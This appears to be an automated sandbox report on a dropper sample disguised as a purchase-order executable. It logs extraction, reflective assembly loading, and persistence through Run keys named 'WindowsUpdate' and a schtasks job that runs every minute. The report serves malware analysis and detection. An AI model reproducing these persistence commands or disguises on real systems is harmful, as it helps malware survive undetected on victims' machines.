                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeSection loaded: wsock32.dll
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeSection loaded: version.dll
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeSection loaded: winmm.dll
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeSection loaded: mpr.dll
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeSection loaded: wininet.dll
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeSection loaded: iphlpapi.dll
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeSection loaded: userenv.dll
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeSection loaded: uxtheme.dll
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeSection loaded: windows.storage.dll
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeSection loaded: wldp.dll
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeSection loaded: ntmarta.dll
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeSection loaded: wsock32.dll
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeSection loaded: version.dll
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeSection loaded: winmm.dll
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeSection loaded: mpr.dll
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeSection loaded: wininet.dll
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeSection loaded: iphlpapi.dll
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeSection loaded: userenv.dll
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeSection loaded: uxtheme.dll
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeSection loaded: windows.storage.dll
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeSection loaded: wldp.dll
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeSection loaded: ntmarta.dll
                          Source: C:\Users\user\Desktop\PO3311926.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                          Source: Slides.lnk.32.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                          Source: Docs.lnk.32.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                          Source: Google Drive.lnk.32.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                          Source: YouTube.lnk.32.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                          Source: Sheets.lnk.32.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                          Source: Gmail.lnk.32.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                          Source: PO3311926.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                          Source: PO3311926.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                          Source: PO3311926.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                          Source: PO3311926.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                          Source: PO3311926.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                          Source: PO3311926.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                          Source: PO3311926.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                          Source: PO3311926.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                          Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: PO3311926.exe
                          Source: Binary string: RegSvcs.pdb, source: RegSvcs.exe, 00000012.00000000.1618125774.0000000000D32000.00000002.00000001.01000000.0000000D.sdmp, RegSvcs.exe.15.dr
                          Source: Binary string: RegSvcs.pdb source: RegSvcs.exe, 00000012.00000000.1618125774.0000000000D32000.00000002.00000001.01000000.0000000D.sdmp, RegSvcs.exe.15.dr
                          Source: PO3311926.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                          Source: PO3311926.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                          Source: PO3311926.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                          Source: PO3311926.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                          Source: PO3311926.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                          Data Obfuscation

                          barindex
                          Source: 8.3.sdadbtvsh.bin.17b6130.0.raw.unpack, Helper.cs.Net Code: Plugin System.Reflection.Assembly.Load(byte[])
                          Source: 20.3.sdadbtvsh.bin.exe.e6f650.0.raw.unpack, Helper.cs.Net Code: Plugin System.Reflection.Assembly.Load(byte[])
                          Source: 26.3.sdadbtvsh.bin.exe.166ebd0.0.raw.unpack, Helper.cs.Net Code: Plugin System.Reflection.Assembly.Load(byte[])
                          Source: 35.3.sdadbtvsh.bin.exe.181df28.0.raw.unpack, Helper.cs.Net Code: Plugin System.Reflection.Assembly.Load(byte[])
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binCode function: 8_2_00595D78 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,8_2_00595D78
                          Source: C:\Users\user\Desktop\PO3311926.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\__tmp_rar_sfx_access_check_3940265Jump to behavior
                          Source: PO3311926.exeStatic PE information: section name: .didat
                          Source: C:\Users\user\Desktop\PO3311926.exeCode function: 0_2_00BBF640 push ecx; ret 0_2_00BBF653
                          Source: C:\Users\user\Desktop\PO3311926.exeCode function: 0_2_00BBEB78 push eax; ret 0_2_00BBEB96
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binCode function: 8_2_005E0332 push edi; ret 8_2_005E0333
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binCode function: 8_2_005B0E06 push ecx; ret 8_2_005B0E19
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binCode function: 8_2_005ADBF6 push cs; iretd 8_2_005ADBFD
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeCode function: 20_2_00AB0332 push edi; ret 20_2_00AB0333
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeCode function: 20_2_00A80E06 push ecx; ret 20_2_00A80E19
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeCode function: 20_2_00A7DBFC push cs; iretd 20_2_00A7DBFD
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeCode function: 20_2_00A7DC00 push eax; iretd 20_2_00A7DC01

                          Persistence and Installation Behavior

                          barindex
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binFile created: C:\Users\user\wrse\sdadbtvsh.binJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Roaming\RegSvcs.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binFile created: C:\Users\user\wrse\sdadbtvsh.bin.exeJump to dropped file
                          Source: C:\Users\user\Desktop\PO3311926.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin.exeJump to dropped file

                          Boot Survival

                          barindex
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RegSvcsJump to behavior
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdateJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /sc minute /mo 1 /tn "RegSvcs" /tr "C:\Users\user\AppData\Roaming\RegSvcs.exe"
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run WindowsUpdateJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run WindowsUpdateJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RegSvcsJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RegSvcsJump to behavior
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdateJump to behavior
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdateJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binCode function: 8_2_006225A0 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,8_2_006225A0
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binCode function: 8_2_005AFC8A GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,8_2_005AFC8A
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeCode function: 20_2_00AF25A0 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,20_2_00AF25A0
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeCode function: 20_2_00A7FC8A GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,20_2_00A7FC8A
                          Source: C:\Users\user\Desktop\PO3311926.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
